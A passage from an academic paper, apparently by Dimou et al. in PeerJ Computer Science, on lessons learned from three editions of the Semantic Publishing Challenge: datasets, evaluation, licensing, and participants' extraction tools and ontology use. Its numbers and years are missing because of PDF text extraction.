challenge. in future, one might therefore consider defining a cross- domain task, e.g., using a dataset of publications from the biomedical domain. validation. evaluating the scientific profiles of participants and the submitted solutions highlights the diversity of professions. the participants of task are mainly active researchers in the fields of nlp (natural language processing), text mining, and information retrieval. submissions to task are mostly from the linked data and semantic publishing communities, addressing various subjects of interest such as user modeling, library science, and artificial intelligence. this diversity of professions was acknowledged while inviting the members of the challenge’s program committee, and during the process of assigning them as reviewers to submissions. best practice. defining independent tasks and using datasets related to other fields of study can build a bridge across disciplines. the use case dataset contains data about computer science publications, and the super-event of the semantic publishing challenge series, the eswc conference, is highly ranked, and thus of potential interest to a wide audience, but focused on a dedicated sub-field of computer science. this choice of subject potentially restricts the target audience and the publicity of the challenge; however, with a slight shift of any of these, it becomes possible to involve other research communities. lessons learned from building training and evaluation datasets the training and output dataset definition are also crucial parts when organizing a challenge. in the semantic publishing challenge case, we experimented with (i) maintaining the same dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. training and output dataset, as well as the same tasks, as in the case of task , and (ii) modifying the dataset but keeping almost the same tasks, as in the case of task and . this way, we bridged the gap between building up initial datasets and exploring possibilities for innovative semantic publishing. as mentioned in ‘semantic publishing challenge: – ’ section, we refined both the datasets and their corresponding tasks over the years according to the participants’ and organizers’ feedback. dataset continuity lesson. we noticed benefits of not only continuing the same tasks but also using the same datasets across multiple editions of the challenge. in task of each edition, we evolved training and evaluation datasets based on the same data source over the three years. participants were able to reuse their existing tools and extend the previously-created knowledge-bases with limited effort. however, for the other tasks, whose datasets were not equally stable, we had to rebuild the competition every year without being able to exploit the past experience. once solutions were submitted for task though and it was repeated with the same dataset in as in , the semantic publishing challenge immediately gained corresponding profit as for task , as the majority of the submitted solutions were resubmitted. this did not happen with task , which did not gain traction in the first place and changing the training dataset and tasks did not attract submissions. therefore, the ‘‘continuity’’ lesson is equally applicable to tasks as well as to datasets. validation. dataset continuity is not as persistent as task continuity for most challenges, but it still occurs. to be more precise, most challenges in principle reuse the same datasets across different editions: two of the four semantic web evaluation challenges with multiple editions reused the same dataset, while the other two did the same except for one of their editions, where a different dataset was considered, albeit one of the same nature. best practice. same datasets should be continuously reused over the course of different editions. nevertheless, eventually substituting them by another dataset of the same nature, where the same tasks and tools are equally applicable, does not harm the challenge. single dataset for all tasks lesson. similarly, we observed that it is valuable to use the same dataset for multiple tasks. for instance, in the semantic web challenge case, completely different datasets were used for task and for the first edition, but complementary datasets were used for the same tasks during the second and third edition, while task considered the previous year’s output of task . the participants can extend their existing tools to compete for different tasks, with limited effort. this also opens new perspectives for future collaboration: participants’ work could be extended and integrated in a shared effort for producing useful data. it is also worth highlighting the importance of such uniformity for the organizers. it reduces the time needed to prepare and validate data, as well as the risk of errors and imperfections. last but not least, it enables designing interconnected tasks and producing richer output. dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. validation. all four semantic web evaluation challenges with multiple editions used the same dataset or subsets of it for all different tasks of the challenge. best practice. it is clearly beneficial for the challenge to consider the same dataset for all tasks. exhaustive output dataset description lesson. an aspect that was underestimated in the first editions of the semantic publishing challenge was the training and output dataset description. while we completely listed all data sources, we did not provide enough information on the expected output: we went into details for the most relevant and critical examples, but we did not provide the exact expected output for all cases in the training dataset. such information should have been provided, as it directly impacts the quality of the submissions and helps participants to refine their tools. validation. according to the survey results, the other semantic web evaluation challenges seem to share the same principle about the exhaustive description of the expected output dataset. to be more precise, only one of the semantic web evaluation challenges does not provide a detailed and exhaustive description of the expected output. best practice. exhaustive and detailed description of both the training and evaluation dataset is required, as it affects the submissions’ quality and helps participants to refine their tools. lessons learned from evaluating results all three editions of the semantic publishing challenge shared the same evaluation procedure (see ‘tasks evaluation’ for details). however, it presented some weaknesses, especially in the first two editions, which we subsequently addressed. three lessons are derived from the issues that are explained below. entire dataset evaluation lesson. even though we asked participants to run their tools on the entire evaluation dataset, we considered only a subset for the final evaluation. the subset has been randomly selected from clusters representing different cases, which participants were required to address. on the one hand, since the subset was representative of these cases, we received a fair indication of each tool capabilities. on the other hand, some submissions were penalized as their tool could have worked well on other values, which were not taken into account for the evaluation. in the second edition, we tried to resolve this issue by increasing the number of evaluation queries, without reaching the desired results though, but causing instead some additional overhead to the participants. in the third edition, we reduced the number of evaluation queries, but we radically increased their coverage to assure that the greatest part of the dataset (or even the whole dataset) is covered. dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. validation. our lesson learned was validated by our survey in this case too. only one of the semantic web evaluation challenges does not take into consideration the entire dataset for the evaluation. best practice. the evaluation method should cover the entire evaluation dataset to be fair, to avoid bias and to reinforce submissions to maintain a high quality across the entire dataset. disjoint training and evaluation dataset lesson. during the first two editions of the semantic publishing challenge, the evaluation dataset was a superset of the training one. this may have resulted in some over-training of the tools, and caused imbalance in the evaluation, as certain tools performed very well for the training dataset but not for the entire dataset. in an effort to avoid this, we made the training and evaluation datasets disjoint for the third edition of the semantic publishing challenge. it is more appropriate to use completely disjoint datasets, as a solution to avoid over-trained tools. validation. our lesson learned regarding disjoint training and evaluation datasets was validated by the other challenge organizers. only one of the semantic web evaluation challenges considers an evaluation dataset which is a subset of the training dataset. all the others consider disjoint training and evaluation datasets. best practice. the training and evaluation dataset should be disjoint to avoid over- trained tools. available evaluation tool lesson. the evaluation was totally transparent and all participants received detailed feedback about their scores, together with links to the open source tool used for the final evaluation. however we were able to release the evaluation tool only after the challenge for the last two editions. the evaluation tool was not made available after the edition, it was only made available after the edition, while it was made available by the end of the training for the edition. it is instead more meaningful to make it available during the training phase, as we did for the challenge’s third edition. participants can then refine their tool and improve the overall quality of their output. moreover, such an approach reduces the (negative) impact of output imperfections. though the content under evaluation was normalized and minor differences were not considered as errors, some imperfections were not expected and were not handled in advance. some participants, for instance, produced csv files with columns in a different order or with minor differences in the iri structure. these all could have been avoided if participants had received feedback during the training phase, with the evaluation tool available as a downloadable stand-alone application or as a service. validation. our lesson learned regarding the availability of the evaluation tool was also validated by our survey. to be more precise, all the semantic web evaluation challenges dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the extraction tool’s integration in the ceur-ws.org production workflow is still in progress but expected to conclude in . make the evaluation tool available to the challenge participants. there is only one that does not, but only because there is no evaluation tool. best practice. the evaluation tool should be made available to the participants as early as possible while the participants are still working with the training dataset and fine tuning their approaches. lessons learned from expected output use and synergies in all three editions of the semantic publishing challenge, the potential use of the expected output was clearly stated in the call, but not the output dataset license; it was up to the participants to choose one. moreover, the challenge was disseminated and supported thanks to synergies with other events. in this section, we outline lessons learned regarding how the expected use of the challenge output and synergies reflect on the challenge perspective, also on the participants and their submissions. expected output use lesson. the uppermost goal of the semantic publishing challenge was to obtain the best output dataset. to achieve that, it is required to identify the best performing tool, namely the tool that actually produces the best output dataset. this tool—or a refined version—is subsequently used to generate the rdf representation of the whole ceur-ws.org corpus . the fact that the submitted tools are expected to be reused becomes a critical issue: participants’ submission should not only target the challenge, but they should produce an output that is directly reusable. therefore, it is in fact critical to state how the results of the challenge will be eventually used, in order to encourage and motivate participants. validation. three out of the other four semantic web evaluation challenges do clearly mention the expected output use, as the semantic publishing challenge does too. best practice. the expected output use and conditions should be explicitly specified in advance. license lesson. the incentive to organize the semantic publishing challenge was to reuse the output dataset. thus, having the permission to do so, which is specified through the dataset license, but also to reuse the tool that produces this output to systematically generate the ceur-ws.org dataset, is of crucial importance. particular attention should be given to the licensing of the output produced by the participants. we did not explicitly say which license the submitted solutions should have: we just requested from participants to use an open license on data (at least as permissive as the source of data) and we encouraged open-source licenses on the tools (but not mandatory). most of the participants did not declare which exact license applies to their data. this is an obstacle for its reusability: especially when data come from heterogeneous sources (e.g., paper full texts copyrighted by the individual authors, as well as metadata copyrighted by the workshops’ chairs) and are heterogeneous in content and format, as in the case of ceur-ws.org, it is very important to provide an explicit representation of the licensing information. dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. validation. like the semantic publishing challenge, none of the other semantic web evaluation challenges specified the tool or output dataset license. as a result, none of the submitted solutions provided any licensing information, apart from one challenge where some of the submitted solutions provided licensing information. even though all semantic web evaluation challenges follow the same practice of not specifying the output dataset potential license, it becomes obvious based on the results that explicitly specifying it is important if the challenge output is desired to be reused. best practice. the output dataset license should be explicitly requested to be provided for each one of the submitted solutions. moreover, participants should be advised to re- spectively specify their tools’ licensing information, to enable inference of their potential re- usability. conflicts and synergies lesson. based on our experience from organizing three editions of the semantic publishing challenge, we realized that the dissemination should happen in a targeted way. to this extent, other events thematically relevant to the challenge are considered important synergies that contribute to generating interest and identifying potential participants: for instance, in the semantic publishing challenge case the fact that the sepublica workshop on semantic publishing was organized at eswc reflected positively on our challenge, since we had fruitful discussions with its participants. moreover, the fact that results from the first two editions of the semantic publishing challenge (vahdati et al., ) were presented at the save-sd workshop on semantics, analytics, visualization and enhancement of scholarly data (save-sd workshop, http://cs.unibo.it/save-sd/ /), which was co-located with www , contributed to the challenge dissemination’s and in particular to an audience both thematically and technologically relevant to the challenge. to the contrary, in , we introduced a task on interlinking and realized possible conflicts with other challenges, like oaei (ontology alignment evaluation initiative), which may have resulted in the lack of participation to task —even though task did not intend to cover the specialized scope of oaei, but rather put the interlinking task into the scope of a certain use case that merely served in aligning the tasks’ outputs among each other and with other datasets in the lod cloud. therefore, we concluded that it is important not only to generate interest but also to identify and avoid potential conflicts. validation. all semantic web evaluation challenges collaborate with the eswc conference, as they are co-located with this event. besides the main conference, which drives the challenges, it appears that most of them, and in particular the most long-standing ones, also collaborate with other events and, in particular, with other workshops. for instance, the qald challenge collaborates with the clef qa track (http://nlp.uned.es/clef-qa/), and the challenge on semantic sentiment analysis collaborates with the workshop on semantic sentiment analysis (http://www.maurodragoni.com/research/opinionmining/events/), which is also co-organized with eswc. last, the oke challenge collaborates with the linked data for information extraction workshop (ld ie) (ld ie workshop, dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://cs.unibo.it/save-sd/ / http://nlp.uned.es/clef-qa/ http://www.maurodragoni.com/research/opinionmining/events/ http://dx.doi.org/ . /peerj-cs. http://web.informatik.uni-mannheim.de/ld ie /ld ie /overview.html) which, in turn, is co-located with iswc. according to our survey, none of the other challenges experienced conflicts with further challenges. best practice. establish synergies with other events that are thematically and/or technologically relevant to reinforce dissemination and to identify potential participants. challenge solutions analysis in this section, we discuss observations from the participants’ solutions and derive corresponding conclusions that can be used in the linked data publishing domain. we group the lessons into four categories: tools, ontologies, data and evaluation process, even though there is some overlap between these aspects. lessons learned from the tools valuable indications can be derived by looking at the tools implemented by the participants. in particular, we focus on the software used to address tasks and . primary analysis observation. the semantic publishing challenge tasks could be addressed by both generic and ad-hoc solutions, as well as different methodologies and approaches; nevertheless, solutions tend to converge. for task , two out of four solutions primarily consisted of a tool developed specifically for this task, whereas the other two solutions only required task-specific templates or rules to be used within their otherwise generic implementations. in the latter case, solution . abstracts the extraction rules from the implementation, whereas solution . keeps them inline with the implementation. those two solutions are generic enough to be adapted even to other domains. even though solutions were methodologically different, four approaches for dealing with the html pages prevailed: (i) structure-based (relying on the html code/structure), (ii) layout-based (relying on the web page layout), (iii) linguistic-based, and (iv) presentation-based. most tools relied on structured-/layout-based approach (three out of four) and only one on a partially linguistic-based approach (solution . ). as far as task is concerned, there were different methodologies and approaches combined in different ways. the overall picture is summarized in tables and . the nature of the task influenced the proposed solutions. in fact the task was composed of two subtasks: (i) identifying the structural components of the pdf papers and (ii) processing the extracted text. thus, some solutions mainly focused on structure-based analysis (five out of eight); others gave more relevance to the linguistic-based analysis (three out of eight) for their primary analysis. last, up to four used the linguistic-based analysis to complement their primary approach, while two solutions also used formatting styles/rules to increase the quality of their output (style-based analysis). we also observed that most solutions implemented a modular pipeline. in particular, the solutions that followed a structure-based analysis had a workflow with a single pipeline, whereas linguistic-based approaches required parallel or iterative pipelines to address dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://web.informatik.uni-mannheim.de/ld ie /ld ie /overview.html http://dx.doi.org/ . /peerj-cs. different aspects of the solution and to increase performance. it is also worth mentioning that two solutions over eight, one being the most innovative solution, adopted an iterative approach. one of them iterates over the same analysis multiple times to refine the results (solution . ); the other one (solution . ) adopted a layered approach, in which each iteration adds new information to the previously-produced output. conclusion. the solutions were methodologically different among each other, and modular and hybrid solutions prevailed compared to case-specific ones. this is important as case- specific solutions do not extend beyond the scope of challenges, but generic ones do. it is interesting to note that both and the best solutions for task relied primarily on structure analysis, whereas the most innovative solutions focused on linguistic analysis. this might indicate that further research on linguistic approaches might bring interesting results for optimizing the output of such tasks. a deep analysis of the structure, in fact, made participants capture more information; on the other hand, these approaches were quite straightforward and less innovative. it is interesting, though, to note here that the best performing tool of grounded its structured-based approach on a prior linguistic analysis, whereas most solutions grounded their linguistic analysis on a prior structure analysis. thus, hybrid solutions are obviously required but their execution order should not be taken for granted. it is also worth discussing the recall score of the linguistic-based tools: these tools most probably suffer from noisy text extraction. in fact the three solutions (solution . , solution . and solution . ) that mainly rely on linguistic analysis achieved the lowest recall scores both in and editions, even though they showed significant improvement in the latter edition. similarly, the tool that relied on a linguistic analysis for task showed significantly lower precision and recall, compared to the other tools, indicating that linguistic-based solutions are not enough, if not supported by a precise structure analysis. even though the linguistic-based approach was considered a rather innovative way of dealing with task , the evaluation showed that a linguistic-based analysis might not be able to perform as well as a structure-based one. methodologies: extraction, intermediate format and machine learning observation. diverse methodologies were employed by the participants to extract and analyze content. there were no prevalent approaches, but some tendencies were observed. for task , three out of four solutions considered rules to extract data from the html pages; two of them considered css to define the rules, while the other one, which relied on linguistic-based analysis, considered jape; the latter solution was based on crawling. last, all solutions used regular expressions at some point of their workflow. for task , half of the solutions in but only two out of five in extracted the text from pdf documents and turned it into plain text. on the contrary, the majority extracted the text from the pdf files but turned it into xml (two out of six solutions in and four out of five in ). there was only one solution that used html as intermediate format. we noted that, both in and , the best performing solutions relied on dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. a pdf-to-xml extraction. moreover, one solution changed from pdf-to-text to pdf- to-xml and indeed performed better in , but we cannot state with high certainty if this was the determining factor. besides extraction, as far as text analysis is concerned, five solutions in and four in relied on supervised machine learning. only two solutions in and one in (the same as in ) additionally relied on unsupervised machine learning to address task . last, all solutions employed heuristics and regular expressions. five out of six solutions in employed natural language processing (nlp) and named entity recognition (ner), and those that also participated in kept nlp/ner in their workflows in . conclusion. solutions based on supervised machine learning were awarded as the most innovative both in and in . therefore, it seems that there is potential on experimenting with supervised machine learning approaches to address such a task. nevertheless, even though the best performing solution in did use supervised machine learning, it is not the case for , which makes us conclude that fundamentally alternative solutions might show good results too. overall, there is potential for improvement and plenty alternative methodologies can be investigated. the intermediate format used by each solution, on the other hand, had no relevant impact on the final results. source tools observation. the semantic publishing challenge call did not prescribe (i) the implementation language, (ii) the license, as well as whether the tools should (iii) reuse existing components or external services, and (iv) be open-sourced or not. the participants were allowed to follow their preferred approaches. three out of four task solutions, as shown in table , and seven out of eight task solutions, as shown in table , primarily relied on java-based implementations. in both cases, the remaining solution relied on python. two out of eight solutions for task complemented their java-based implementations with python-based parts. moreover, as it is observed in table , for task , three out of four solutions relied on tools totally open-sourced, while the fourth one, the one that addressed both task and task , relied on a stack of tools which are open-sourced, but the workflow used was not. this is also observed in most tools for task , as shown in table (six out of the eight solutions). mit (http://opensource.org/licenses/mit-license.html) was the most popular license, with half solutions for task using it and one out of eight solutions for task , followed by agpl- . (https://www.gnu.org/licenses/agpl- . .en.html), with two out of eight solutions for task using it. last, half of the solutions incorporated external services to accomplish the tasks (two out of four for task and four out of eight for task ). the one of the two solutions for task that used external services was the one that participated both in task and task . gate, dbpedia, crossref api (http://api.crossref.org/), and freecite (http://freecite.library.brown.edu/) are the most used external services. conclusion. open-sourced tools prevailed over closed-sourced ones. none of the participants used a totally closed or proprietary software. most of the them used an dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://opensource.org/licenses/mit-license.html https://www.gnu.org/licenses/agpl- . .en.html http://api.crossref.org/ http://freecite.library.brown.edu/) http://dx.doi.org/ . /peerj-cs. open license, and java and python based implementations prevailed both for task and task . the integration of external services was also a valuable solution for the participants. lessons learned from models and ontologies in this section, we discuss the different solutions with respect to the data model, the vocabularies and the way they used them to annotate the data. data model observation. all task solutions tend to converge regarding the data model, identify- ing the same core concepts: conference, workshop, proceedings, papers, and person. a few solutions covered more details, for instance, solution . identified also the concepts of invited papers and proceedings chair, while solution . captured different types of sessions by identifying additionally the concepts of session, keynote session, invited session and poster session, as well as the concepts of organization and topic. in particular for task , solution . domain modeling was inspired by the model used in solution . , with some simplifications, a practice commonly observed in real linked data set modeling. in contrast, task solutions used more heterogeneous data models. there are six high-level properties identified by all solutions: identifier, type, title, authors, affiliation and country. other entities were instead described in different ways and with different granularity. that happened, for instance, to the entities organization, funding agency and grant. in certain cases they are identified as separate entities and in other cases their details constitute part of other entities descriptions (and are expressed as data or object properties). the coverage of the data models was also heterogeneous: for the edition, for instance, not all solutions identify the sections and capture the notion of caption of figures and tables. conclusion. based on the aforementioned, we observe a trend of converging in respect to the model the ceur-ws.org dataset should have according to the submitted solutions. most solutions converge on the main identified concepts in the data (conference, workshop, proceedings, paper and person) and on the ceur-ws.org dataset’s graph at least for task , namely the publications’ metadata. the way the tasks and their corresponding queries are described contributes towards this direction. vocabularies observation. there is a wide range of vocabularies and ontologies that can be used to annotate scholarly data. most of the solutions preferred to (re)use almost the same existing ontologies and vocabularies, as summarized in table . six out of twelve solutions for both task and used the semantic web for research communities (swrc) vocabulary (swrc, http://swrc.ontoware.org/ontology#), five used the bibliographic ontology (bibo) vocabulary (bibo, http://purl.org/ontology/bibo/) and three used the semantic web conference (swc) vocabulary (swc, http://data.semanticweb.org/ns/swc/ontology#). moreover, six solutions used one or more vocabularies of the semantic publishing and referencing ontologies (spar, http://www.sparontologies.net/). in particular, five solutions used the frbr-aligned bibliographic ontology (fabio, http://purl.org/spar/ fabio/) ontology, three the publishing roles ontology (pro, http://purl.org/spar/pro/), dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://swrc.ontoware.org/ontology# http://purl.org/ontology/bibo/ http://data.semanticweb.org/ns/swc/ontology# http://www.sparontologies.net/ http://purl.org/spar/fabio/ http://purl.org/spar/fabio/ http://purl.org/spar/pro/ http://dx.doi.org/ . /peerj-cs. three the document components ontology (doco, http://purl.org/spar/doco/), two the bibliographic reference ontology (biro, http://purl.org/spar/biro/), two the funding, research administration and projects ontology (frapo, http://purl.org/cerif/frapo/) and one the functional requirements for bibliographic records (frbr, http://purl.org/ spar/frbr/). besides the domain-specific vocabularies and ontologies, eight solutions used the dublin core vocabulary (dc, http://purl.org/dc/elements/ . / and dcterms, http://purl.org/dc/terms/), eight the friend of a friend vocabulary (foaf , http://xmlns.com/ foaf/ . /), five solutions used the dbpedia ontology (dbo, http://dbpedia.org/ontology/), three the vcard (vcard, http://www.w .org/ /vcard/ns#) and two the event (event ontology, http://purl.org/net/c dm/event.owl#) and timeline (timeline ontology, http://purl.org/net/c dm/timeline.owl#) ontologies and schema.org (http://schema.org). last, there were four solutions that used their own custom vocabularies, in combination with existing ones in most cases, but only one used barely its custom vocabulary. in contrast to task solutions, which all converged on using same vocabularies and ontologies intuitively, task solutions reused a wider range and relatively different vocabularies and ontologies to annotate same entities appearing in the same data, which is extracted from pdf documents. this is a consequence of the rather diverse data models considered by different solutions. interestingly, most task solutions use sub-ontologies of the spar ontologies family. last, most solutions reuse the three most popular vocabularies in the education field according to schmachtenberg, bizer & paulheim ( ). the general purpose vocabularies—such as foaf—used by the participants are also listed high in the same ranking. conclusion. it is evident that the spirit of vocabulary reuse gains traction. however, it is interesting that different solutions used the same ontologies to annotate the same data differently (see also ‘annotations’ section). annotations observation. even though all solutions used almost the same vocabularies, not all of them used the same vocabulary terms to annotate the same entities. as far as task is concerned, all solutions only converged on annotating persons using the foaf:person class. for the other main concepts the situation was heterogeneous, as reported in table . a few of them also explicitly annotated persons using the foaf:agent class, even though foaf:person is a subclass of foaf:agent. foaf:agent was also used by one of the solutions during the first edition, but it was then replaced by the more explicit foaf:person. the conference concept was well-captured by all solutions. it is interesting to note that, for the first edition, most solutions used relatively generic vocabulary terms, e.g., swrc:event, swc:event or swc:organizedevent to annotate the data. however, in the second edition, most solutions preferred to use more explicit vocabulary terms for the same concept, e.g., swrc:conference and bibo:conference, while they also maintained the more generic vocabulary terms for events. the same occurred with the paper concept. the edition datasets were annotated using more generic vocabulary terms, e.g., swrc:publication or even foaf:document, whereas in dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://purl.org/spar/doco/ http://purl.org/spar/biro/ http://purl.org/cerif/frapo/ http://purl.org/spar/frbr/ http://purl.org/spar/frbr/ http://purl.org/dc/elements/ . / http://purl.org/dc/terms/ http://xmlns.com/foaf/ . / http://xmlns.com/foaf/ . / http://dbpedia.org/ontology/ http://www.w .org/ /vcard/ns# http://purl.org/net/c dm/event.owl# http://purl.org/net/c dm/timeline.owl# http://schema.org http://dx.doi.org/ . /peerj-cs. more explicit terms were preferred, such as swrc:inproceedings or bibo:article. in particular swrc:inproceedings was adopted by three out of four solutions. in contrast to task solutions, which focus on identifying and describing concrete entities, task solutions mainly focus on capturing their properties. this is also evident from the fact that task solutions rarely provide the entities’ types, whereas task solutions always do, even though this information could be inferred from the properties used. moreover, task solutions generate much fewer entities than task solutions. all task solutions use approximately the same number of properties. it is interesting though to note that solutions that follow in principle the linguistic approach tend to use more predicates, which are more explicit and more descriptive too. all solutions have approximately the same number of predicates, but their precision is still not accurate. only one of task solutions (solution . ) has a significantly higher number of predicates compared to the other solutions. this occurs because different uris are used for the same relationships appearing in different files to annotate the data. for instance, the section-title property appears with different uris, such as the following: http://ceur-ws.org/vol- /paper #section-title, or http://ceur-ws.org/vol- /paper_ #section-title. however, such a choice prevents easily identifying same relationships. dcmi is the vocabulary most frequently used by all solutions for annotating the identifier and the title. rdf(s) is also used for the title (represented as rdfs:label), as well as for the entities’ types. for the remaining properties, a wide range of different vocabularies are considered, but they do not converge on their choices. indicatively: one of the solutions considers schema:mentions to describe a citation, whereas other solutions consider bibo:cites or biro:references. in the same context, some solutions associate authors to papers with the dcterms:creator property, whereas others consider foaf:maker. moreover, some solutions indicate the affiliation using the swrc:affiliation property, whereas others use pro:relatestoorganization, or some solutions represent the publication year using swrc:year, whereas others use fabio:haspublicationyear. last, it is interesting to note that solutions may even use vocabulary terms that do not exist, such as swrc:section. conclusion. on the one hand, the more familiar the data publishers get with the data, the more explicit they become with the annotations they use and the more they converge on the choices they make. on the other hand, the way different solutions extract particular properties reflects on the final data model. lessons learned from submitted rdf datasets in this section, we discuss the different solutions with respect to the rdf dataset they produce. successive submissions improvements observation. from the first edition to the second edition of the semantic publishing challenge, we noticed that the participants who re-submitted their solutions had improved the overall dataset, not only the parts useful to answer the queries. for dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://ceur-ws.org/vol- /paper #section-title http://ceur-ws.org/vol- /paper_ #section-title http://dx.doi.org/ . /peerj-cs. instance, all three solutions of task that had participated in both the and the editions modified the way they represented their data, and this resulted in corresponding improvements to the overall dataset. indicatively, as far as task is concerned, solution . addressed a number of shortcom- ings the previous tool’s version had, in particular regarding data transformations, which might have influenced their precision improvement. heyvaert et al. ( ) also assessed their mappings’ quality to verify the schema is valid with respect to the used vocabularies and ontologies. to address the same issue and avoid inconsistencies in their dataset, solution . preferred to align different ontologies’ classes and properties, e.g., aligning bibo to the swrc ontologies, as swc already has some dependencies on swrc. as far as task is concerned, some parts of solution . , for instance, were changed for participating in the edition. the authors employed different processing steps of their tool, which were not used in the previous edition, e.g., processing section headings, hierarchy and captions, but they also introduced novel aspects driven by the challenge tasks and queries, e.g., extracting links from supplementary material. among the changes of solution . , it was the pdf extraction tool used, whose change might have partially contributed to their recall improvement, while a number of additional or new conditional heuristics most probably led to their precision improvement. overall, it was observed that improvements to extraction might reflect on the solutions’ recall, whereas improvements to text analysis on their precision. conclusion. the improvement of the dataset was evident on some aspects and indeed the results were satisfying, but we still see room for improvement. it is interesting though to note that solutions did not remain focused on improving just the data extraction parts of the challenge, but also the data modeling, even though the latter is not directly assessed by the challenge. dataset structure observation. the different solutions differ significantly with respect to the size of the produced dataset. this happens for different reasons. solution . shows an extraordinary number of triples compared to other solutions. this occurs to a certain extent because each concept is annotated with at least two classes, making one fourth of the dataset to be type declarations. moreover, they include even annotations that indicate the type of the resource or property on a very low level, namely they use rdfs:class, rdfs:property, as well as owl:objectproperty or owl:annotationproperty etc., which counts for almost , triples of the total dataset. solution . also shows a high number of triples. this occurs because the same dataset contains triples describing the structure of the html page, as well as triples describing the actual content of the pages. nevertheless, the main reason that causes the flow of triples is the fact that a new uri is generated each time a concept appears in one of the ceur-ws.org volumes. for instance, the person ruben verborgh appears to have uris, e.g., http://ceur-ws.org/vol- /#rubeniverborgh for the vol- proceedings or http://ceur-ws.org/vol- /#rubeniverborgh for the vol- proceedings. the person christoph lange appears to have distinct uris, e.g., for dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://ceur-ws.org/vol- /#rubeniverborgh http://ceur-ws.org/vol- /#rubeniverborgh http://dx.doi.org/ . /peerj-cs. the definition of task was not explicit with regard to whether different persons with the same name (within or across different workshops proceedings volumes) should be assumed to be the same person or not. our current work towards the release of a consolidated ceur-ws.org dataset shows that the far majority of same names refers to the same person, which is plausible as ceur-ws.org focuses on the relatively small computer science community. however, a general solution would be wrong to simply assume that same names mean same persons, whereas a full disambiguation of names would require a lot of information to be taken into account beyond the proceedings’ tables of content: the title pages of the pdf papers plus possibly external resources. our instructions did not prescribe whether or not participants should assume persons with the same name to be the same. in the reality of the ceur-ws.org data, there are very few cases in which the same name refers to two different persons, as the data covers the relatively small domain of computer science researchers. vol- proceedings, the http://ceur-ws.org/vol- /#christophilange, or for vol- proceedings, the http://ceur-ws.org/vol- /#christophilange . solutions . and . are approximately at the same number of triples both for the and the editions. conclusion. there is a very high heterogeneity in the produced datasets; although solutions tend to agree on used vocabularies, their design choices are very different and, as a consequence, the number and organization of the triples is very heterogeneous. coverage observation. we further noticed that solutions rarely agree upon the extracted information. for instance, some skip the extraction of wrong data or certain other information. overall, we observed significant differences with respect to the number of identified entities per category. the results for task are summarized in tables and , while the results for task are summarized in table . produced datasets were very heterogeneous in term of size, number of triples and entities. as far as task is concerned, apparently, solution . and solution . used the individual pages to identify the proceedings, whereas solution . and solution . used the index page to identify the proceedings, this is the reason that there is so big difference in the number of proceedings entities. the number of identified papers is also significantly different among the different solutions, but in the persons case we observe the greatest variation in terms of numbers because of different practices of assigning uris; a few solutions reuse uris across different proceedings volumes, others do not . as far as task is concerned, solutions tend to omit certain subtasks and to optimize their performance on others due to the nature of the task—queries were quite heterogeneous, with a clear distinction, for instance, between the analysis of the structural components and of the textual content of the papers. for instance, in , the best performing solution focused on precisely addressing the subtasks which were related to the document structure and totally omitted queries related to funding and ontologies, as shown in table . similarly, in , certain solutions completely omitted the queries that were related to supplementary material or tables and pictures captions. consequently, the dataset size, as well as the number of triples and entities significantly diverge among the solutions. conclusion. the datasets’ heterogeneity is also evident in the amount and type of informa- tion each dataset provides. however, the more the solutions improve, the more the solutions converge at least regarding the number of retrieved and/or distinctly identified entities. lessons learned from the solutions with respect to the evaluation in this section, we discuss the different solutions with respect to the dataset evaluation. ranking observation. for task , in the performance ranking of the three tools evolved from has not changed but their performance has improved except for solution . , which improved precision but recall remain the same. disregarding the two queries that were new in , solution . , which had won the best performance award in , performs almost as well as solution . . dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://ceur-ws.org/vol- /#christophilange http://ceur-ws.org/vol- /#christophilange http://dx.doi.org/ . /peerj-cs. the trend was slightly different for task : all tools participating in the challenge for the second time increased their performance, but the overall ranking changed. solution . obtained a higher score than solution . in , contrarily to what happened in . the position of solution . was stable. conclusion. continuity helps participants to improve their tools; the overall ranking keeps stable if the tasks (and queries) are kept stable; adjustments to the tasks (and queries) may impact the ranking, favoring one team more than another. new and legacy solutions observation. task participants both in and had an improved version of different aspects of their solution, which resulted in correspondingly improved versions of the final dataset. the new solution . , which introduced a fundamentally new approach, achieved equally good results as the best solution of . the same trend was evident in task , with a general improvement of all solutions that were re-proposed for the second year ( and ). conclusion. legacy solutions might be able to improve and bring stable and good results, however there is still room for improvement and mainly for fundamentally new ideas that surpass problems that legacy solutions cannot deal with. equal chances observation. solution . , the winners of task in , participated in with an improved version but did not win. the winner was a new tool with a brand new approach (solution . ). the same happened for task : in , one winner (solution . ) was a brand-new solution, the other one (solution . ) was an extension and improvement of a legacy solution but did not win the year before. conclusion. the winners were not the same in subsequent versions of the challenge: creativity won. discussion: challenge impact on linked data quality in the ‘introduction’ section we motivated the semantic publishing challenge as a means of producing high-quality linked data. in this section, we assess the potential impact of the challenge on the quality of the linked data produced. to be more precise, the quality of the linked data produced by the tools submitted has been assessed by comparing the output of a number of prescribed queries against our gold standard and measuring precision and recall, as explained in ‘tasks evaluation’ section. assessing the quality of linked data by running queries over it is a common approach, as the comparison of tools by zaveri et al. ( ) confirms, whose recent survey we refer to for a comprehensive review of the state of the art regarding linked data quality assessment. therefore, a challenge designed as the semantic publishing challenge could act as a means to assess the linked data quality, and, the better the results, the higher the linked data quality is expected to be. dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the specific quality metrics that our 